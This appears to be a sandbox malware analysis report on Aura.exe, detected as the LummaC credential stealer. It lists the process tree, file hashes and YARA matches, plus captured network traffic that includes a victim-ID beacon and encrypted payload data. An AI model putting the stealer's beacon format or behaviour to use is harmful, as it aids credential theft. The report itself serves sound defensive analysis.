2025-03-12 20:42:38 UTC	103	OUT	Data Raw: 75 69 64 3d 66 34 30 63 33 66 66 39 36 32 64 63 64 62 34 66 36 62 63 36 38 31 30 62 33 36 65 32 66 36 66 65 39 62 64 38 32 62 37 34 66 61 37 66 36 66 66 61 62 30 62 61 63 66 37 65 26 63 69 64 3d 26 68 77 69 64 3d 44 32 46 36 41 46 45 36 46 37 39 32 33 30 37 42 36 41 42 42 39 30 42 42 38 44 45 46 36 46 32 36 Data Ascii: uid=f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e&cid=&hwid=D2F6AFE6F792307B6ABB90BB8DEF6F26
2025-03-12 20:42:39 UTC	781	IN	HTTP/1.1 200 OK Date: Wed, 12 Mar 2025 20:42:38 GMT Content-Type: application/octet-stream Content-Length: 10472 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v6nO3lbv%2FzDe4GRAneU0SiQ1w6vjA6HyuSziB2mvKrEI%2FJtwR4h8hIoViN008qCADBgYrzHiI6EsNs1bgWxuwcXulDcNAjsQvxqp5cExHDggaWSxjOnx9vAkcc3zbibpKAcZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91f61e866d3a7221-JAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15098&min_rtt=13498&rtt_var=6205&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1005&delivery_rate=214550&cwnd=251&unsent_bytes=0&cid=f5f14b6b49126c6a&ts=839&x=0"
2025-03-12 20:42:39 UTC	588	IN	Data Raw: b0 5c 3d 28 6e ac fa 42 99 61 fa cd 6f 12 a3 7f 02 07 2b 46 96 bc 38 d6 23 7d 40 45 d0 6f 7d 22 e6 95 44 88 7c f7 40 0e 5d 93 86 1e d2 fc 9d f9 2f e3 73 b0 8a 8e 56 13 d6 b1 fc 56 b0 e0 6b 7a 88 76 92 13 bd 04 ae 8d 4c 98 3c 16 11 5a c1 e4 89 92 ea c1 7c 26 23 a0 92 bd 4e 47 12 9f 6b 19 8f 2d 31 20 29 12 f3 82 69 3c 04 1d ed 3a 89 3c 73 52 3a 6d bc a1 68 85 b4 0f 51 14 b0 d2 c9 3a fc 74 69 77 f6 a5 26 4c c4 34 a0 5d f7 dc 6e e6 c0 a4 f5 65 6d 15 32 f2 de 8f f3 02 26 c1 7f ab 2c 32 e4 0b 6c da 4d 06 13 18 70 ab a5 4a 53 36 b6 fd 64 63 1c 8b 98 c7 5d 9f ee b0 41 1a 4a 6c 27 a3 3b 29 76 e7 cf 5a 3c 04 09 84 ed f4 48 63 0e a8 0a 3b fe 4e 54 14 dc 80 6c d4 39 a1 00 14 f2 4f 72 7f 7a fa af f4 ae 76 21 1e 13 b4 11 be 9a 83 86 82 a5 76 b9 c5 a4 63 e1 dd 2e 43 da Data Ascii: \=(nBao+F8#}@Eo}"D\|@]/sVVkzvL<Z\|&#NGk-1 )i<:<sR:mhQ:tiw&L4]nem2&,2lMpJS6dc]AJl';)vZ<Hc;NTl9Orzv!vc.C
2025-03-12 20:42:39 UTC	1369	IN	Data Raw: b9 ab de 7c 97 36 f4 50 9e ef 1a 3a ae 15 f3 96 b7 4e 0e d5 5b 13 e1 8f 91 d2 3d fa 38 44 39 f7 20 f8 b4 0a 5f 56 dd 9a cd cf 65 90 93 e7 ac 20 2e f7 b3 e5 80 52 1c 70 1b a3 50 01 65 20 9f 67 06 6d ba 0f a0 d1 7a b5 dc 5a 9a 4b bc 9a 47 c7 ac f5 00 a7 25 0e 44 2c 60 4a dc a4 0a 3c 95 66 c9 e2 52 26 cc 7b 1e 55 5d 2b b9 28 06 89 73 70 7f 75 cd a2 16 b4 74 bf c2 79 6e 99 54 ca e0 f6 50 ed 71 0a 79 06 8e 86 18 a4 df 70 14 20 b2 66 5b 89 9b 26 5e 96 08 14 61 d0 3e 12 a9 ab b3 da 37 8d d7 6b 2b b5 c3 58 e3 13 17 5c 09 c4 09 0f 7a fd 6a 37 62 fd 82 5d e5 f1 a9 a8 f8 d5 fc 1c 57 88 53 59 d7 8d a1 d7 46 67 a2 2a ff b7 56 f9 bd 4d 2d 0f b0 9c 1c 73 5f 84 7b d9 c5 9a 06 9f eb 9c 13 74 ed 64 ef 5c 1a 01 55 00 7a 2e 31 3a e3 9d 45 64 c3 98 1d 46 ce c5 50 95 ee 7b b8 Data Ascii: \|6P:N[=8D9 _Ve .RpPe gmzZKG%D,`J<fR&{U]+(sputynTPqyp f[&^a>7k+X\zj7b]WSYFg*VM-s_{td\Uz.1:EdFP{
2025-03-12 20:42:39 UTC	1369	IN	Data Raw: 8f 88 52 2b 05 62 51 f6 45 40 59 0f 04 97 9b 97 71 bb 55 1b 26 6f a0 1f ee 35 20 1f 2c 1d 80 3c 8c f6 82 e1 7b 91 c0 7f 15 64 b9 c4 09 88 6a 4e 67 c9 7a 25 15 83 54 9c 8f f1 ba fd a0 84 d8 56 87 dd a9 0d b0 4b b6 77 06 67 9d 79 61 9c a4 cf db 67 70 13 01 93 3f 4a 9a 8e 3b 68 9c 84 3a e3 93 4f f0 65 42 1f b2 19 af d5 7a 7d 76 1a aa cd 59 83 4a 75 a5 33 58 fd 5c 4c c7 03 a0 ce 98 59 6b 8b 6e af 5a 9c 80 39 89 39 13 6d 33 75 d0 03 87 8d 73 0b df 96 92 ff 55 13 e6 a3 e7 df 02 bf cc 74 47 cf 47 9c fc 4b d7 0d be ce 34 a5 ab 64 6f 5c 94 30 63 47 e9 37 24 cb 00 3b 1a 25 44 4a 1a bd 0a 90 9a 78 00 92 1d 81 de 77 4c 18 a9 4b 0b 06 e2 2c 5c 8c de 75 23 b8 76 f9 62 4a 61 8f 7d 1f d2 ff 93 19 99 fa ce 53 04 f7 30 85 12 ee 07 69 ec e5 04 cb 07 1b 8c 71 58 03 50 02 05 Data Ascii: R+bQE@YqU&o5 ,<{djNgz%TVKwgyagp?J;h:OeBz}vYJu3X\LYknZ99m3usUtGGK4do\0cG7$;%DJxwLK,\u#vbJa}S0iqXP
2025-03-12 20:42:39 UTC	1369	IN	Data Raw: 35 43 a7 7c 9b 5b 92 d7 89 ae f1 fd a5 1b e9 ee f2 68 7e 9e a7 51 37 26 8a 07 c0 42 72 d9 cb 13 d8 ea 96 f1 73 ac 03 7c fa ff 84 df 38 27 a6 99 4d e6 2d b8 4d 1a 94 5f 20 63 9b 98 a0 28 15 76 27 9e 58 ba 32 12 11 32 0d 7b bf 08 9e 64 47 ee 7d f8 f2 db 7e d2 ba de 07 99 e2 d9 06 91 83 98 f4 16 6e be ab 89 f1 7b 08 37 b9 9a 4b e1 be 3d df f3 d2 20 e7 c2 67 ad 1f 9f 19 a7 9c 8a 44 63 c5 7c 21 d7 17 48 d2 e5 c5 27 89 a0 d6 f9 01 09 be 7e 4b f8 f6 f8 1f 10 f0 7c 56 dc f5 09 40 d7 e3 db 2e 03 7b fb d0 99 0e 7f 54 82 95 e1 52 dd 29 fe 5e ca 03 67 e2 ba 23 72 b2 8c 6e 33 7c f8 8b e2 f7 a9 c9 e3 7f 74 d8 ce 37 53 16 bb b0 19 9d 1c 49 25 9d c8 4f 53 b3 a4 7e 47 44 64 ad db 6c db 61 48 b6 ca 9f 21 04 20 96 8f 6a a8 64 db 60 3f 9f 58 61 30 d3 a0 84 4e b0 cf c7 c3 71 Data Ascii: 5C\|[h~Q7&Brs\|8'M-M_ c(v'X22{dG}~n{7K= gDc\|!H'~K\|V@.{TR)^g#rn3\|t7SI%OS~GDdlaH! jd`?Xa0Nq
2025-03-12 20:42:39 UTC	1369	IN	Data Raw: bc 76 0e 1b 07 9d f3 f9 e5 c2 ac e1 b7 f0 d9 75 40 e0 31 60 3c 4f fb b6 ff 6e 33 36 49 ce 9f 11 57 79 41 93 c8 3f 49 f8 88 18 e0 0f 65 e4 6d 90 9a 27 e6 32 ec 7f c5 cc 4f 13 79 ba 28 07 8e 0b ec bb 31 9c f1 0e cc 57 84 31 52 fb c8 eb a3 2a c5 ad 81 17 99 fd 33 d4 a3 d9 41 12 96 71 f1 0d e0 15 a6 89 21 3d 02 d4 50 92 16 8d 5a f6 e9 75 11 91 8f 4a 66 3d 52 72 ce 89 b9 cf 91 d1 43 05 91 8e 56 3f 0d e1 bd 84 40 d9 6a 99 75 99 77 95 b9 74 63 ec 4c 67 dd cd ee fc f0 b7 bf 67 4c 48 71 74 a1 78 f8 51 78 83 64 31 5d a8 26 b9 4f 57 69 d6 51 1e b8 7c 91 50 81 08 b0 5d 1c 9a 6c 7e f2 9a 64 94 ca da 84 81 c0 41 e7 e9 51 5c 4e 65 04 eb 0b a4 01 1a c5 02 42 ea dc d2 48 de 26 fa 76 4a 08 b9 60 68 c6 f5 52 16 c7 c9 f8 bf 49 5f 36 a3 23 c8 b8 3f c3 1a 27 e5 43 78 4e 7f 3d Data Ascii: vu@1`<On36IWyA?Iem'2Oy(1W1R*3Aq!=PZuJf=RrCV?@juwtcLggLHqtxQxd1]&OWiQ\|P]l~dAQ\NeBH&vJ`hRI_6#?'CxN=
2025-03-12 20:42:39 UTC	1369	IN	Data Raw: 1e 8e b5 57 fc 01 63 9c e4 a3 45 65 0d b3 18 dc 5e 74 6d b9 13 b3 89 0c 02 bd a8 ef 27 7c 2b 99 07 aa fb f6 1f d3 62 90 38 e5 03 56 11 54 9b d1 fe 50 a5 f6 d6 76 9d f1 fa 5b c3 c5 e3 96 89 8f 07 16 8c 95 ce 5d 05 02 5b 88 80 0b a3 b9 ac 2d 19 bc cf d1 8d 71 89 e8 7a 97 99 2b 1f 1b 3e d3 05 ca cb 60 23 db 60 b9 8a 11 85 fb d8 f2 bc af 79 64 de ea b3 bb 8c 6e b1 5e 32 34 dc 87 38 2a 10 69 7a db 8e 56 9f 75 16 37 66 f0 bf 9b ec ac 7b 8e 85 c7 73 d0 7e 2f 9e a0 f1 66 dd 98 07 bd 6a ab dd a4 bd bb 9e f9 44 ef d7 1e 13 c3 5d d8 d9 34 2a f8 40 93 8d 1e b1 36 08 a8 5d 8e 93 a7 c0 58 e5 55 c4 17 bf ec 0a 86 53 5f b7 50 2e 9f ac 7e 4f fb cd d9 d5 a3 5f 38 c3 d8 03 2a d8 e4 5a db 23 9f f4 65 fd 64 ee 48 ad 28 6a 02 15 e2 d9 7c 5f 01 3b 8a 04 0d ce 3a 47 80 ee a2 0e Data Ascii: WcEe^tm'\|+b8VTPv[][-qz+>`#`ydn^248izVu7f{s~/fjD]4@6]XUS_P.~O_8*Z#edH(j\|_;:G
2025-03-12 20:42:39 UTC	1369	IN	Data Raw: 4a 53 3a b7 a8 ba 60 f0 d1 77 d7 0b b1 7b d6 f5 18 d6 73 8f 6f 6e f5 94 05 5b 0e 14 07 8f 78 5e 45 3e 13 63 64 3a e0 18 d0 ea 8f 09 86 58 47 12 a7 dd 07 86 3f 57 f8 ec 4d 61 b9 f2 93 5d 3e e5 ac 84 cd cb 94 11 17 42 ba a0 cc 6d 3c c6 6b 87 a5 70 4c 39 90 d7 03 a9 1c b1 4e 90 bd 41 13 e6 78 4d 41 2d 7e 5b bd 58 c0 cb 04 75 93 12 66 1d 25 bd 47 a9 c3 aa 32 52 c1 ae 85 7c 2a 0b c0 22 99 70 81 0c 90 f9 ea 42 40 ba c4 b6 a9 a7 1c 1a 54 b8 dc 71 3c fe f6 f8 0b f1 60 e3 a3 7b 49 7f 34 77 5a 3d fb 64 c7 f5 f3 a3 83 71 5e 2c a5 49 db ff 86 2b 6c 49 20 4e 7b bf 4d 8e 25 1d 7a d6 a6 08 9a 21 5b 05 e9 01 b8 ca be a3 0b e1 5e 2c 31 36 b6 c3 56 64 a9 68 81 a9 19 88 b4 a3 bd a4 ad 02 99 bd c6 a3 5b 15 2f 30 e7 f9 e1 db 8c 26 e6 04 48 9c c9 5b 2a 71 24 44 96 77 43 f5 f4 Data Ascii: JS:`w{son[x^E>cd:XG?WMa]>Bm<kpL9NAxMA-~[Xuf%G2R\|"pB@Tq<`{I4wZ=dq^,I+lI N{M%z![^,16Vdh[/0&H[q$DwC
2025-03-12 20:42:39 UTC	1369	IN	Data Raw: 1b 48 05 0f f1 4c 0e 01 d0 e0 21 f6 93 11 e4 88 7c f4 73 a0 24 90 93 7a 6f 4f 4d 55 07 67 d3 44 e6 ea 8c 5f 29 35 07 f0 7a dd 32 ba 6d af 89 90 80 28 6c 69 92 bf 58 a4 ac ed 22 42 0e 49 93 b3 f7 2c 2e e7 67 36 c9 e4 a2 0c 97 e5 41 e2 76 be d8 65 00 cd f5 95 36 1f 1c f9 f1 d9 08 12 16 cf 02 7f 22 25 25 e4 80 ed 68 ff 6d b4 3f 61 19 8e 44 7b 81 47 14 c3 71 56 01 5c a9 89 5d 03 f8 cd 2e 6c c5 d3 50 b0 19 58 6b 39 ae 31 8a d7 69 8f 09 cc e0 fe 75 03 03 57 ef 71 bd ec 92 aa 8b 67 91 84 46 cb 0c fa 86 cd 9a 89 43 b8 00 4c 5b df f0 66 ec 89 b1 a5 80 b2 e7 cc 3c 7f 20 08 06 c9 1b 58 7d 02 9f 31 c4 d4 70 d2 ee df c5 e6 ad c1 75 a7 88 5c 99 43 22 e3 63 c4 5e ca f2 44 a7 9e e4 5a 62 86 1d 34 31 69 1f 16 14 f8 c1 79 bb bc 73 49 b4 34 4d a2 c2 55 08 24 66 15 6e 6b c1 Data Ascii: HL!\|s$zoOMUgD_)5z2m(liX"BI,.g6Ave6"%%hm?aD{GqV\].lPXk91iuWqgFCL[f< X}1pu\C"c^DZb41iysI4MU$fnk
2025-03-12 20:42:39 UTC	301	IN	Data Raw: dc cc 60 a9 28 11 00 63 21 ea 71 9e 0a 74 73 79 e2 a9 2d d7 c3 0e 89 15 ae e8 75 84 12 19 c7 ac 0b e1 67 49 1c a6 0d b6 25 55 58 4c ba 3c 42 46 4d f9 f8 7d 42 6d e9 58 31 de 53 e2 87 58 bb 75 8c 7f c9 7f 53 bc 88 1e 40 fc 25 4d 09 f2 30 43 28 d3 56 b8 15 0f 15 82 f2 40 c6 d3 76 b8 c5 9f 83 af 2e 68 4a b0 3f 9f 33 4a 87 85 8e 77 d4 ea 8b 73 53 4f 43 c1 28 49 8f 8b 82 3e 63 15 a0 d9 77 cc 1d fe 10 ee 67 97 8a 6e 62 7f e5 01 13 c9 24 5a a4 c9 ab dd 30 62 e3 73 df 4a a3 c6 f3 83 9b 1a 97 aa 72 5c 54 13 03 32 b4 04 3c c7 af 44 4e 74 d5 20 5e 0d 6e b5 fe 00 6a 78 8d 9d 19 6e 04 9b 74 26 4c 8c 60 53 53 29 6d ba 00 4b 59 30 0c 9d a9 0c 57 e8 51 61 21 cf a1 4e 99 af 4c 70 68 49 00 34 09 61 4b dc 4c ee 32 4a 88 7b e3 f2 73 6c 8c 80 b9 66 0d ce 5f 77 23 f2 15 1f 26 Data Ascii: `(c!qtsy-ugI%UXL<BFM}BmX1SXuS@%M0C(V@v.hJ?3JwsSOC(I>cwgnb$Z0bsJr\T2<DNt ^njxnt&L`SS)mKY0WQa!NLphI4aKL2J{slf_w#&

Target ID:	0
Start time:	16:42:11
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\Aura.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Aura.exe"
Imagebase:	0xbe0000
File size:	1'374'720 bytes
MD5 hash:	777F258D5F2E3E78413027726B439FCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:42:11
Start date:	12/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:42:11
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\Aura.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Aura.exe"
Imagebase:	0xbe0000
File size:	1'374'720 bytes
MD5 hash:	777F258D5F2E3E78413027726B439FCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:42:11
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\Aura.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Aura.exe"
Imagebase:	0xbe0000
File size:	1'374'720 bytes
MD5 hash:	777F258D5F2E3E78413027726B439FCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:42:11
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\Aura.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Aura.exe"
Imagebase:	0xbe0000
File size:	1'374'720 bytes
MD5 hash:	777F258D5F2E3E78413027726B439FCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1340998626.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1344718805.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1282396896.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000004.00000002.2438218367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1344787476.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1345469435.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	16:42:11
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7808 -s 404
Imagebase:	0x630000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Aura.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Aura.exe_f41d6ba581e1ba5a896754c8db9d22e26dd8665_f87db1fa_5a1e1b65-4ce1-4184-b53b-1fac494c0505\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBA1.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC00.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC30.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Windows Analysis Report
Aura.exe